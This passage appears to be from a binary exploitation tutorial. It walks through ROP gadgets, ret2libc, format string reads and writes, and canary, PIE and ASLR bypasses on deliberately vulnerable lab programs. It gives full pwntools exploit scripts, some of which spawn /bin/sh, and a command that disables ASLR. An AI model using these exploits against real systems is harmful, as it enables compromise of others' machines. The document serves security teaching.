Registers are used for parameters, but the return address is still pushed onto the stack and in ROP is placed right after the function address
Multiple Parameters
calling-convention-multi-param
Source
#include <stdio.h>
void vuln(int check, int check2, int check3) {
if(check == 0xdeadbeef && check2 == 0xdeadc0de && check3 == 0xc0ded00d) {
puts("Nice!");
} else {
puts("Not nice!");
}
}
int main() {
vuln(0xdeadbeef, 0xdeadc0de, 0xc0ded00d);
vuln(0xdeadc0de, 0x12345678, 0xabcdef10);
}
32-bit
We've seen the full disassembly of an almost identical binary, so I'll only isolate the important parts.
0x080491dd 680dd0dec0 push 0xc0ded00d
0x080491e2 68dec0adde push 0xdeadc0de
0x080491e7 68efbeadde push 0xdeadbeef
0x080491ec e871ffffff call sym.vuln
[...]
0x080491f7 6810efcdab push 0xabcdef10
0x080491fc 6878563412 push 0x12345678
0x08049201 68dec0adde push 0xdeadc0de
0x08049206 e857ffffff call sym.vuln
It's just as simple - push
them in reverse order of how they're passed in. The reverse order becomes helpful when you db sym.vuln
and print out the stack.
[0x080491bf]> db sym.vuln
[0x080491bf]> dc
hit breakpoint at: 8049162
[0x08049162]> pxw @ esp
0xffb45efc 0x080491f1 0xdeadbeef 0xdeadc0de 0xc0ded00d
So it becomes quite clear how more parameters are placed on the stack:
return pointer param1 param2 param3 [...] paramN
64-bit
0x00401170 ba0dd0dec0 mov edx, 0xc0ded00d
0x00401175 bedec0adde mov esi, 0xdeadc0de
0x0040117a bfefbeadde mov edi, 0xdeadbeef
0x0040117f e89effffff call sym.vuln
0x00401184 ba10efcdab mov edx, 0xabcdef10
0x00401189 be78563412 mov esi, 0x12345678
0x0040118e bfdec0adde mov edi, 0xdeadc0de
0x00401193 e88affffff call sym.vuln
So as well as rdi
, we also push to rdx
and rsi
(or, in this case, their lower 32 bits).
Bigger 64-bit values
Just to show that it is in fact ultimately rdi
and not edi
that is used, I will alter the original one-parameter code to utilize a bigger number:
#include <stdio.h>
void vuln(long check) {
if(check == 0xdeadbeefc0dedd00d) {
puts("Nice!");
}
}
int main() {
vuln(0xdeadbeefc0dedd00d);
}
If you disassemble the main
, you can see it disassembles to
movabs rdi, 0xdeadbeefc0ded00d
call sym.vuln
movabs
can be used to encode themov
instruction for 64-bit instructions - treat it as if it's amov
.
Gadgets
Controlling execution with snippets of code
Gadgets are small snippets of code followed by a ret
instruction, e.g. pop rdi; ret
. We can manipulate the ret
of these gadgets in such a way as to string together a large chain of them to do what we want.
Example
Let's for a minute pretend the stack looks like this during the execution of a pop rdi; ret
gadget.
What happens is fairly obvious - 0x10
gets popped into rdi
as it is at the top of the stack during the pop rdi
. Once the pop
occurs, rsp
moves:
And since ret
is equivalent to pop rip
, 0x5655576724
gets moved into rip
. Note how the stack is laid out for this.
Utilizing Gadgets
When we overwrite the return pointer, we overwrite the value pointed at by rsp
. Once that value is popped, it points to the next value at the stack - but wait. We can overwrite the next value in the stack.
Let's say that we want to exploit a binary to jump to a pop rdi; ret
gadget, pop 0x100
into rdi
then jump to flag()
. Let's step-by-step the execution.
On the original ret
, which we overwrite the return pointer for, we pop the gadget address in. Now rip
moves to point to the gadget, and rsp
moves to the next memory address.
rsp
moves to the 0x100
; rip
to the pop rdi
. Now when we pop, 0x100
gets moved into rdi
.
RSP moves to the next item on the stack, the address of the flag()
. The ret
is executed and flag()
is called.
Summary
Essentially, if the gadget pops values from the stack, simply place those values afterward (including the pop rip
in ret
). If we want to pop 0x10
into rdi
and then jump to 0x16
, our payload would look like this:
Note if you have multiple pop
instructions, you can just add more values.
We use
rdi
as an example because, if you remember, that's the register for the first parameter in 64-bit. This means control of this register using this gadget is important.
Finding Gadgets
We can use the tool ROPgadget
to find possible gadgets.
$ ROPgadget --binary vuln-64
Gadgets information
============================================================
0x0000000000401069 : add ah, dh ; nop dword ptr [rax + rax] ; ret
0x000000000040109b : add bh, bh ; loopne 0x40110a ; nop ; ret
0x0000000000401037 : add byte ptr [rax], al ; add byte ptr [rax], al ; jmp 0x401024
[...]
Combine it with grep
to look for specific registers.
$ ROPgadget --binary vuln-64 | grep rdi
0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x00000000004011db : pop rdi ; ret
Exploiting Calling Conventions
Utilizing Calling Conventions
32-bit
The program expects the stack to be laid out like this before executing the function:
So why don't we provide it like that? As well as the function, we also pass the return address and the parameters.
Everything after the address of flag()
will be part of the stack frame for the next function as it is expected to be there - just instead of using push
instructions we just overwrote them manually.
from pwn import *
p = process('./vuln-32')
payload = b'A' * 52 # Padding up to EIP
payload += p32(0x080491c7) # Address of flag()
payload += p32(0x0) # Return address - don't care if crashes when done
payload += p32(0xdeadc0de) # First parameter
payload += p32(0xc0ded00d) # Second parameter
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
64-bit
Same logic, except we have to utilize the gadgets we talked about previously to fill the required registers (in this case rdi
and rsi
as we have two parameters).
We have to fill the registers before the function is called
from pwn import *
p = process('./vuln-64')
POP_RDI, POP_RSI_R15 = 0x4011fb, 0x4011f9
payload = b'A' * 56 # Padding
payload += p64(POP_RDI) # pop rdi; ret
payload += p64(0xdeadc0de) # value into rdi -> first param
payload += p64(POP_RSI_R15) # pop rsi; pop r15; ret
payload += p64(0xc0ded00d) # value into rsi -> first param
payload += p64(0x0) # value into r15 -> not important
payload += p64(0x40116f) # Address of flag()
payload += p64(0x0)
log.info(p.clean())
p.sendline(payload)
log.info(p.clean())
ret2libc
The standard ROP exploit
A ret2libc is based on the system
function found within the C library. This function executes anything passed to it making it the best target. Another thing found within libc is the string /bin/sh
; if you pass this string to the system
, it will pop a shell.
And that is the entire basis of it - passing /bin/sh
as a parameter to the system
. Doesn't sound too bad, right?
Disabling ASLR
To start with, we are going to disable ASLR. ASLR randomizes the location of libc in memory, meaning we cannot (without other steps) work out the location of the system
and /bin/sh
. To understand the general theory, we will start with it disabled.
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Manual Exploitation
Getting Libc and its base
Fortunately, Linux has a command called ldd
for dynamic linking. If we run it on our compiled ELF file, it'll tell us the libraries it uses and their base addresses.
$ ldd vuln-32
linux-gate.so.1 (0xf7fd2000)
libc.so.6 => /lib32/libc.so.6 (0xf7dc2000)
/lib/ld-linux.so.2 (0xf7fd3000)
We need libc.so.6
, so the base address of libc is 0xf7dc2000
.
Libc base and the system and /bin/sh offsets may be different for you. This isn't a problem - it just means you have a different libc version. Make sure you use your values.
Getting the location of the system()
To call the system, we obviously need its location in memory. We can use the readelf
command for this.
$ readelf -s /lib32/libc.so.6 | grep system
1534: 00044f00 55 FUNC WEAK DEFAULT 14 system@@GLIBC_2.0
The -s
flag tells readelf
to search for symbols, for example, functions. Here we can find the offset of the system from the libc base is 0x44f00
.
Getting the location of /bin/sh
Since /bin/sh
is just a string, we can use strings
on the dynamic library we just found with ldd
. Note that when passing strings as parameters you need to pass a pointer to the string, not the hex representation of the string, because that's how C expects it.
$ strings -a -t x /lib32/libc.so.6 | grep /bin/sh
18c32b /bin/sh
-a
tells it to scan the entire file; -t x
tells it to output the offset in hex.
32-bit Exploit
from pwn import *
p = process('./vuln-32')
libc_base = 0xf7dc2000
system = libc_base + 0x44f00
binsh = libc_base + 0x18c32b
payload = b'A' * 76 # The padding
payload += p32(system) # Location of system
payload += p32(0x0) # return pointer - not important once we get the shell
payload += p32(binsh) # pointer to command: /bin/sh
p.clean()
p.sendline(payload)
p.interactive()
64-bit Exploit
Repeat the process with the libc
linked to the 64-bit exploit (should be called something like /lib/x86_64-linux-gnu/libc.so.6
).
Note that instead of passing the parameter in after the return pointer, you will have to use a pop rdi; ret
gadget to put it into the RDI register.
$ ROPgadget --binary vuln-64 | grep rdi
[...]
0x00000000004011cb : pop rdi ; ret
from pwn import *
p = process('./vuln-64')
libc_base = 0x7ffff7de5000
system = libc_base + 0x48e20
binsh = libc_base + 0x18a143
POP_RDI = 0x4011cb
payload = b'A' * 72 # The padding
payload += p64(POP_RDI) # gadget -> pop rdi; ret
payload += p64(binsh) # pointer to command: /bin/sh
payload += p64(system) # Location of system
payload += p64(0x0) # return pointer - not important once we get the shell
p.clean()
p.sendline(payload)
p.interactive()
Automating with Pwntools
Unsurprisingly, pwntools has a bunch of features that make this much simpler.
# 32-bit
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
libc = elf.libc # Simply grab the libc it's running with
libc.address = 0xf7dc2000 # Set base address
system = libc.sym['system'] # Grab location of system
binsh = next(libc.search(b'/bin/sh')) # grab string location
payload = b'A' * 76 # The padding
payload += p32(system) # Location of system
payload += p32(0x0) # return pointer - not important once we get the shell
payload += p32(binsh) # pointer to command: /bin/sh
p.clean()
p.sendline(payload)
p.interactive()
The 64-bit looks essentially the same.
Pwntools can simplify it even more with its ROP capabilities, but I won't showcase them here.
Format String Bug
Reading memory off the stack
Format String is a dangerous bug that is easily exploitable. If manipulated correctly, you can leverage it to perform powerful actions such as reading from and writing to arbitrary memory locations.
Why it exists
In C, certain functions can take "format specifier" within strings. Let's look at an example:
int value = 1205;
printf("Decimal: %d\nFloat: %f\nHex: 0x%x", value, (double) value, value);
This prints out:
Decimal: 1205
Float: 1205.000000
Hex: 0x4b5
So, it replaced %d
with the value, %f
with the float value and %x
with the hex representation.
This is a nice way in C of formatting strings (string concatenation is quite complicated in C). Let's try print out the same value in hex 3 times:
int value = 1205;
printf("%x %x %x", value, value, value);
As expected, we get
4b5 4b5 4b5
What happens, however, if we don't have enough arguments for all the format specifiers?
int value = 1205;
printf("%x %x %x", value);
4b5 5659b000 565981b0
Erm... what happened here?
The key here is that printf
expects as many parameters as format string specifiers, and in 32-bit it grabs these parameters from the stack. If there aren't enough parameters on the stack, it'll just grab the next values - essentially leaking values off the stack. And that's what makes it so dangerous.
How to abuse this
Surely if it's a bug in the code, the attacker can't do much, right? Well, the real issue is when C code takes user-provided input and prints it out using printf
.
#include <stdio.h>
int main(void) {
char buffer[30];
gets(buffer);
printf(buffer);
return 0;
}
If we run this normally, it works as expected:
$ ./test
yes
yes
But what happens if we input a format string specifier, such as %x
?
$ ./test
%x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520
It reads values off the stack and returns them as the developer wasn't expecting so many format string specifiers.
Choosing Offsets
To print the same value 3 times, using
printf("%x %x %x", value, value, value);
Gets tedious - so, there is a better way in C.
printf("%1$x %1$x %1$x", value);
The 1$
between tells printf to use the first parameter. However, this also means that attackers can read values an arbitrary offset from the top of the stack - say we know there is a canary at the 6th %p
- instead of sending %p %p %p %p %p %p
, we can just do %6$p
. This allows us to be much more efficient.
Arbitrary Reads
In C, when you want to use a string you use a pointer to the start of the string - this is essentially a value that represents a memory address. So when you use the %s
format specifier, it's the pointer that gets passed to it. That means instead of reading a value of the stack, you read the value in the memory address it points at.
Now this is all very interesting - if you can find a value on the stack that happens to correspond to where you want to read, that is. But what if we could specify where we want to read? Well... we can.
Let's look back at the previous program and its output:
$ ./test
%x %x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520 25207825
You may notice that the last two values contain the hex values of %x
. That's because we're reading the buffer. Here it's at the 4th offset - if we can write an address and then point %s
at it, we can get an arbitrary write!
$ ./vuln
ABCD|%6$p
ABCD|0x44434241
%p
is a pointer; generally, it returns the same as%x
just precedes it with a0x
which makes it stand out more
As we can see, we're reading the value we inputted. Let's write a quick pwntools script that writes the location of the ELF file and reads it with %s
- if all goes well, it should read the first bytes of the file, which is always \x7fELF
. Start with the basics:
from pwn import *
p = process('./vuln')
payload = p32(0x41424344)
payload += b'|%6$p'
p.sendline(payload)
log.info(p.clean())
$ python3 exploit.py
[+] Starting local process './vuln': pid 3204
[*] b'DCBA|0x41424344'
Nice it works. The base address of the binary is 0x8048000
, so let's replace the 0x41424344
with that and read it with %s
:
from pwn import *
p = process('./vuln')
payload = p32(0x8048000)
payload += b'|%6$s'
p.sendline(payload)
log.info(p.clean())
It doesn't work.
The reason it doesn't work is that printf
stops at null bytes, and the very first character is a null byte. We have to put the format specifier first.
from pwn import *
p = process('./vuln')
payload = b'%8$p||||'
payload += p32(0x8048000)
p.sendline(payload)
log.info(p.clean())
Let's break down the payload:
- We add 4
|
because we want the address we write to fill one memory address, not half of one and half another, because that will result in reading the wrong address - The offset is
%8$p
because the start of the buffer is generally at%6$p
. However, memory addresses are 4 bytes long each and we already have 8 bytes, so it's two memory addresses further along at%8$p
.
$ python3 exploit.py
[+] Starting local process './vuln': pid 3255
[*] b'0x8048000||||'
It still stops at the null byte, but that's not important because we get the output; the address is still written to memory, just not printed back.
Now let's replace the p
with an s
.
$ python3 exploit.py
[+] Starting local process './vuln': pid 3326
[*] b'\x7fELF\x01\x01\x01||||'
Of course, %s
will also stop at a null byte as strings in C are terminated with them. We have worked out, however, that the first bytes of an ELF file up to a null byte is \x7fELF\x01\x01\x01
.
Arbitrary Writes
Luckily C contains a rarely-used format specifier %n
. This specifier takes in a pointer (memory address) and writes there the number of characters written so far. If we can control the input, we can control how many characters are written and also where we write them.
Obviously, there is a small flaw - to write, say, 0x8048000
to a memory address, we would have to write that many characters - and generally buffers aren't quite that big. Luckily there are other format string specifiers for that. I fully recommend you watch this video to completely understand it, but let's jump into a basic binary.
#include <stdio.h>
int auth = 0;
int main() {
char password[100];
puts("Password: ");
fgets(password, sizeof password, stdin);
printf(password);
printf("Auth is %i\n", auth);
if(auth == 10) {
puts("Authenticated!");
}
}
Simple - we need to overwrite the variable auth
with the value 10. Format string vulnerability is obvious, but there's also no buffer overflow due to a secure fgets
.
Work out the location of auth
As it's a global variable, it's within the binary itself. We can check the location using readelf
to check for symbols.
$ readelf -s auth | grep auth
34: 00000000 0 FILE LOCAL DEFAULT ABS auth.c
57: 0804c028 4 OBJECT GLOBAL DEFAULT 24 auth
The location of auth
is 0x0804c028
.
Writing the Exploit
We're lucky there are no null bytes, so there's no need to change the order.
$ ./auth
Password:
%p %p %p %p %p %p %p %p %p
0x64 0xf7f9f580 0x8049199 (nil) 0x1 0xf7ff5980 0x25207025 0x70252070 0x20702520
Buffer is the 7th %p
.
from pwn import *
AUTH = 0x804c028
p = process('./auth')
payload = p32(AUTH)
payload += b'|' * 6 # We need to write the value 10, AUTH is 4 bytes, so we need 6 more for %n
payload += b'%7$n'
print(p.clean().decode('latin-1'))
p.sendline(payload)
print(p.clean().decode('latin-1'))
And easy peasy:
[+] Starting local process './auth': pid 4045
Password:
[*] Process './auth' stopped with exit code 0 (pid 4045)
(À\x04||||||
Auth is 10
Authenticated!
Pwntools
As you can expect, pwntools has a handy feature for automating %n
format string exploits:
payload = fmtstr_payload(offset, {location : value})
The offset
in this case is 7
because the 7th %p
read the buffer; the location is where you want to write it and the value is what. Note that you can add as many location-value pairs into the dictionary as you want.
payload = fmtstr_payload(7, {AUTH : 10})
You can also grab the location of the auth
symbol with pwntools:
elf = ELF('./auth')
AUTH = elf.sym['auth']
Check out the pwntools tutorials for more cool features
Binary Exploitation - Stack
https://ir0nstone.gitbook.io/notes/
Stack Canaries
The Buffer Overflow defense
Stack Canaries are very simple - at the beginning of the function, a random value is placed on the stack. Before the program executes ret
, the current value of that variable is compared to the initial: if they are the same, no buffer overflow has occurred.
If they are not, the attacker attempted to overflow to control the return pointer, and the program crashes, often with a ***stack smashing detected***
error message.
On Linux, stack canaries end in 00
. This is so that they null-terminate any strings in case you make a mistake when using print functions, but it also makes them much easier to spot.
Bypassing Canaries
There are two ways to bypass a canary.
Leaking it
This is quite broad and will differ from binary to binary, but the main aim is to read the value. The simplest option is using format string if it is present - the canary, like other local variables, is on the stack, so if we can leak values off the stack it's easy.
Source
#include <stdio.h>
void vuln() {
char buffer[64];
puts("Leak me");
gets(buffer);
printf(buffer);
puts("");
puts("Overflow me");
gets(buffer);
}
int main() {
vuln();
}
void win() {
puts("You won!");
}
The source is very simple - it gives you a format string vulnerability, then a buffer overflow vulnerability. The format string we can use to leak the canary value, then we can use that value to overwrite the canary with itself. This way, we can overflow past the canary but not trigger the check as its value remains constant. And of course, we just have to run win()
.
32-bit
First, let's check if there is a canary:
$ pwn checksec vuln-32
[*] 'vuln-32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
Yup, there is. Now we need to calculate at what offset the canary is at and to do this we'll use radare2.
$ r2 -d -A vuln-32
[0xf7f2e0b0]> db 0x080491d7
[0xf7f2e0b0]> dc
Leak me
%p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
0xffd7cd60 0xffd7cd7c 0xffd7cdec 0x00000002 0x0804919e |...............
0xffd7cd70 0x08048034 0x00000000 0xf7f57000 0x00007025 4........p..%p..
0xffd7cd80 0x00000000 0x00000000 0x08048034 0xf7f02a28 ........4...(*..
0xffd7cd90 0xf7f01000 0xf7f3e080 0x00000000 0xf7d53ade .............:..
0xffd7cda0 0xf7f013fc 0xffffffff 0x00000000 0x080492cb ................
0xffd7cdb0 0x00000001 0xffd7ce84 0xffd7ce8c 0xadc70e00 ................
The last value there is the canary. We can tell because it's roughly 64 bytes after the "buffer start", which should be close to the end of the buffer. Additionally, it ends in 00
and looks very random, unlike the libc and stack addresses that start with f7
and ff
. If we count the number of addresses it's around 24 until that value, so we go one before and one after as well to make sure.
$./vuln-32
Leak me
%23$p %24$p %25$p
0xa4a50300 0xf7fae080 (nil)
It appears to be at %23$p
. Remember, stack canaries are randomized for each new process, so it won't be the same.
Now let's just automate grabbing the canary with pwntools:
from pwn import *
p = process('./vuln-32')
log.info(p.clean())
p.sendline('%23$p')
canary = int(p.recvline(), 16)
log.success(f'Canary: {hex(canary)}')
$ python3 exploit.py
[+] Starting local process './vuln-32': pid 14019
[*] b'Leak me\n'
[+] Canary: 0xcc987300
Now all that's left is to work out what the offset is until the canary, and then the offset from after the canary to the return pointer.
$ r2 -d -A vuln-32
[0xf7fbb0b0]> db 0x080491d7
[0xf7fbb0b0]> dc
Leak me
%23$p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
[...]
0xffea8af0 0x00000001 0xffea8bc4 0xffea8bcc 0xe1f91c00
We see the canary is at 0xffea8afc
. A little later on the return pointer (we assume) is at 0xffea8b0c
. Let's break just after the next gets()
and check what value we overwrite it with (we'll use a De Bruijn pattern).
[0x080491d7]> db 0x0804920f
[0x080491d7]> dc
0xe1f91c00
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA
hit breakpoint at: 804920f
[0x0804920f]> pxw @ 0xffea8afc
0xffea8afc 0x41574141 0x41415841 0x5a414159 0x41614141 AAWAAXAAYAAZAAaA
0xffea8b0c 0x41416241 0x64414163 0x41654141 0x41416641 AbAAcAAdAAeAAfAA
Now we can check the canary and EIP offsets:
[0x0804920f]> wopO 0x41574141
64
[0x0804920f]> wopO 0x41416241
80
The returned pointer is 16 bytes after the canary start, so 12 bytes after the canary.
from pwn import *
p = process('./vuln-32')
log.info(p.clean())
p.sendline('%23$p')
canary = int(p.recvline(), 16)
log.success(f'Canary: {hex(canary)}')
payload = b'A' * 64
payload += p32(canary) # overwrite canary with original value to not trigger
payload += b'A' * 12 # pad to return pointer
payload += p32(0x08049245)
p.clean()
p.sendline(payload)
print(p.clean().decode('latin-1'))
64-bit
Same source, same approach, just 64-bit. Try it yourself before checking the solution.
Remember, in 64-bit format string goes to the relevant registers first and the addresses can fit 8 bytes each so the offset may be different.
Bruteforcing the Canary
This is possible on 32-bit, and sometimes unavoidable. It's not, however, feasible on 64-bit.
As you can expect, the general idea is to run the process loads and load of times with random canary values until you get a hit, which you can differentiate by the presence of a known plaintext, e.g. flag{
and this can take ages to run and is frankly not a particularly interesting challenge.
PIE
Position Independent Code
Overview
PIE stands for Position Independent Executable, which means that every time you run the file it gets loaded into a different memory address. This means you cannot hardcode values such as function addresses and gadget locations without finding out where they are.
Analysis
Luckily, this does not mean it's impossible to exploit. PIE executables are based on relative rather than absolute addresses, meaning that while the locations in memory are fairly random the offsets between different parts of the binary remain constant. For example, if you know that the function main
is located 0x128
bytes in memory after the base address of the binary, and you somehow find the location of main
, you can simply subtract 0x128
from this to get the base address and from the addresses of everything else.
Exploitation
So, all we need to do is find a single address and PIE is bypassed. Where could we leak this address from?
The stack of course!
We know that the return pointer is located on the stack - and much like a canary, we can use format string (or other ways) to read the value of the stack. The value will always be a static offset away from the binary base, enabling us to completely bypass PIE!
Double-Checking
Due to the way PIE randomization works, the base address of a PIE executable will always end in the hexadecimal characters 000
. This is because pages are the things being randomized in memory, which have a standard size of 0x1000
. Operating Systems keep track of page tables that point to each section of memory and define the permissions for each section, similar to segmentation.
Checking the base address ends in 000
should probably be the first thing you do if your exploit is not working as you expected.
Pwntools, PIE, and ROP
As shown in the pwntools ELF tutorial, pwntools has a host of functionality that allows you to really make your exploit dynamic. Simply setting elf.address
will automatically update all the function and symbols addresses for you, meaning you don't have to worry about using readelf
or other command line tools, but instead can receive it all dynamically.
Not to mention that the ROP capabilities are incredibly powerful as well.
PIE Bypass with Given Leak
Exploiting PIE with a given leak
The Source
#include <stdio.h>
int main() {
vuln();
return 0;
}
void vuln() {
char buffer[20];
printf("Main Function is at: %lx\n", main);
gets(buffer);
}
void win() {
puts("PIE bypassed! Great job :D");
}
Pretty simple - we print the address of the main
, which we can read and calculate the base address from. Then, using this, we can calculate the address of win()
itself.
Analysis
Let's just run the script to make sure it's the right one :D
$ ./vuln-32
Main Function is at: 0x5655d1b9
Yup, and as we expected, it prints the location of the main
.
Exploitation
First, let's set up the script. We create an ELF
object, which becomes very useful later on, and start the process.
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
Now we want to take in the main
function location. To do this we can simply receive up until it (and do nothing with that) and then read it.
p.recvuntil('at: ')
main = int(p.recvline(), 16)
Since we received the entire line except for the address, only the address will come up with
p.recvline()
.
Now we'll use the ELF
object we created earlier and set its base address. The sym
dictionary returns the offsets of the functions from the binary base until the base address is set, after which it returns the absolute address in memory.
elf.address = main - elf.sym['main']
In this case, elf.sym['main']
will return 0x11b9
; if we ran it again, it would return 0x11b9
+ the base address. So, essentially, we're subtracting the offset of the main
from the address we leaked to get the base of the binary.
Now we know the base we can just call win()
.
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.sendline(payload)
print(p.clean().decode('latin-1'))
By this point, I assume you know how to find the padding length and other stuff we've been mentioning for a while, so I won't be showing you every step of that.
And does it work?
[*] 'vuln-32'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process 'vuln-32': pid 4617
PIE bypassed! Great job :D
Awesome!
Final Exploit
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
p.recvuntil('at: ')
main = int(p.recvline(), 16)
elf.address = main - elf.sym['main']
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.sendline(payload)
print(p.clean().decode('latin-1'))
Summary
From the leaked address of the main
, we were able to calculate the base address of the binary. From this, we could then calculate the address of the win
and call it.
And one thing I would like to point out is how simple this exploit is. Look - it's 10 lines of code, at least half of which is scaffolding and setup.
64-bit
Try this for yourself first, then feel free to check the solution. Same source, same challenge.
PIE Bypass
Using format string
The Source
#include <stdio.h>
void vuln() {
char buffer[20];
printf("What's your name?\n");
gets(buffer);
printf("Nice to meet you ");
printf(buffer);
printf("\n");
puts("What's your message?");
gets(buffer);
}
int main() {
vuln();
return 0;
}
void win() {
puts("PIE bypassed! Great job :D");
}
Unlike last time, we don't get given a function. We'll have to leak it with format strings.
Analysis
$ ./vuln-32
What's your name?
%p
Nice to meet you 0xf7f6d080
What's your message?
hello
Everything's as we expect.
Exploitation
Setup
As last time, first, we set everything up.
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
PIE Leak
Now we just need a leak. Let's try a few offsets.
$ ./vuln-32
What's your name?
%p %p %p %p %p
Nice to meet you 0xf7eee080 (nil) 0x565d31d5 0xf7eb13fc 0x1
3rd one looks like a binary address, let's check the difference between the 3rd leak and the base address in radare2. Set a breakpoint somewhere after the format string leak (doesn't really matter where).
$ r2 -d -A vuln-32
Process with PID 5548 started...
= attach 5548 5548
bin.baddr 0x565ef000
0x565f01c9]> db 0x565f0234
[0x565f01c9]> dc
What's your name?
%3$p
Nice to meet you 0x565f01d5
We can see the base address is 0x565ef000
and the leaked value is 0x565f01d5
. Therefore, subtracting 0x1d5
from the leaked address should give us the binary. Let's leak the value and get the base address.
p.recvuntil('name?\n')
p.sendline('%3$p')
p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)
elf.address = elf_leak - 0x11d5
log.success(f'PIE base: {hex(elf.address)}') # not required, but a nice check
Now we just need to send the exploit payload.
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.recvuntil('message?\n')
p.sendline(payload)
print(p.clean().decode())
Final Exploit
from pwn import *
elf = context.binary = ELF('./vuln-32')
p = process()
p.recvuntil('name?\n')
p.sendline('%3$p')
p.recvuntil('you ')
elf_leak = int(p.recvline(), 16)
elf.address = elf_leak - 0x11d5
log.success(f'PIE base: {hex(elf.address)}')
payload = b'A' * 32
payload += p32(elf.sym['win'])
p.recvuntil('message?\n')
p.sendline(payload)
print(p.clean().decode())
64-bit
Same deal, just 64-bit. Try it out :)
ASLR
Address Space Layout Randomisation
Overview
ASLR stands for Address Space Layout Randomisation and can, in most cases, be thought of as libc
's equivalent of PIE - every time you run a binary, libc
(and other libraries) get loaded into a different memory address.
While it's tempting to think of ASLR as
libc
PIE, there is a key difference.ASLR is a kernel protection while PIE is a binary protection. The main difference is that PIE can be compiled into the binary while the presence of ASLR is completely dependent on the environment running the binary. If I sent you a binary compiled with ASLR disabled while I did it, it wouldn't make any difference at all if you had ASLR enabled.
Of course, as with PIE, this means you cannot hardcode values such as function address (e.g. system
for a ret2libc).
The Format String Trap
It's tempting to think that, as with PIE, we can simply format string for a libc address and subtract a static offset from it. Sadly, we can't quite do that.
When functions finish execution, they do not get removed from memory; instead, they just get ignored and overwritten. Chances are very high that you will grab one of these remnants with the format string. Different libc versions can act very differently during execution, so a value you just grabbed may not even exist remotely, and if it does the offset will most likely be different (different libcs have different sizes and therefore different offsets between functions). It's possible to get lucky, but you shouldn't really hope that the offsets remain the same.
Instead, a more reliable way is reading the GOT entry of a specific function.
Double-Checking
For the same reason as PIE, libc base addresses always end in the hexadecimal characters 000
.
ASLR Bypass with Given Leak
The Source
#include <stdio.h>
#include <stdlib.h>
void vuln() {
char buffer[20];
printf("System is at: %lp\n", system);
gets(buffer);
}
int main() {
vuln();
return 0;
}
void win() {
puts("PIE bypassed! Great job :D");
}
Just as we did for PIE, except this time we print the address of the system.
Analysis
$ ./vuln-32
System is at: 0xf7de5f00
Yup, does what we expected.
Your address of the system might end in different characters - you just have a different libc version
Exploitation
Much of this is as we did with PIE.
from pwn import *
elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
Note that we include the libc here - this is just another ELF
object that makes our lives easier.
Parse the address of the system and calculate the libc base from that (as we did with PIE):
p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)
libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')
Now we can finally ret2libc, using the libc
ELF
object to really simplify it for us:
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()
Final Exploit
from pwn import *
elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()
p.recvuntil('at: ')
system_leak = int(p.recvline(), 16)
libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
p.interactive()
64-bit
Try it yourself :)
Using pwntools
If you prefer, you could have changed the following payload to be more pwntoolsy:
payload = flat(
'A' * 32,
libc.sym['system'],
0x0, # return address
next(libc.search(b'/bin/sh'))
)
p.sendline(payload)
Instead, you could do:
binsh = next(libc.search(b'/bin/sh'))
rop = ROP(libc)
rop.raw('A' * 32)
rop.system(binsh)
p.sendline(rop.chain())
The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.
PLT and GOT
Bypassing ASLR
The PLT and GOT are sections within an ELF file that deal with a large portion of the dynamic linking. Dynamically linked binaries are more common than statically linked binary in CTFs. The purpose of dynamic linking is that binaries do not have to carry all the code necessary to run within them - this reduces their size substantially. Instead, they rely on system libraries (especially libc
, the C standard library) to provide the bulk of the functionality. For example, each ELF file will not carry its own version of puts
compiled within it - it will instead dynamically link to the puts
of the system it is on. As well as smaller binary sizes, this also means the user can continually upgrade their libraries, instead of having to redownload all the binaries every time a new version comes out.
So when it's on a new system, it replaces function calls with hardcoded addresses?
Not quite.
The problem with this approach is it requires libc
to have a constant base address, i.e. be loaded in the same area of memory every time it's run, but remember that *ASLR* exists. Hence the need for dynamic linking. Due to the way ASLR works, these addresses need to be resolved every time the binary is run. Enter the PLT and GOT.
The PLT and GOT
The PLT (Procedure Linkage Table) and GOT (Global Offset Table) work together to perform the linking.
When you call puts()
in C and compile it as an ELF executable, it is not actually puts()
- instead, it gets compiled as puts@plt
. Check it out in GDB:
Why does it do that?
Well, as we said, it doesn't know where puts
actually are - so it jumps to the PLT entry of puts
instead. From here, puts@plt
does some very specific things:
- If there is a GOT entry for
puts
, it jumps to the address stored there. - If there isn't a GOT entry, it will resolve it and jump there.
The GOT is a massive table of addresses; these addresses are the actual locations in memory of the libc
functions. puts@got
, for example, will contain the address of puts
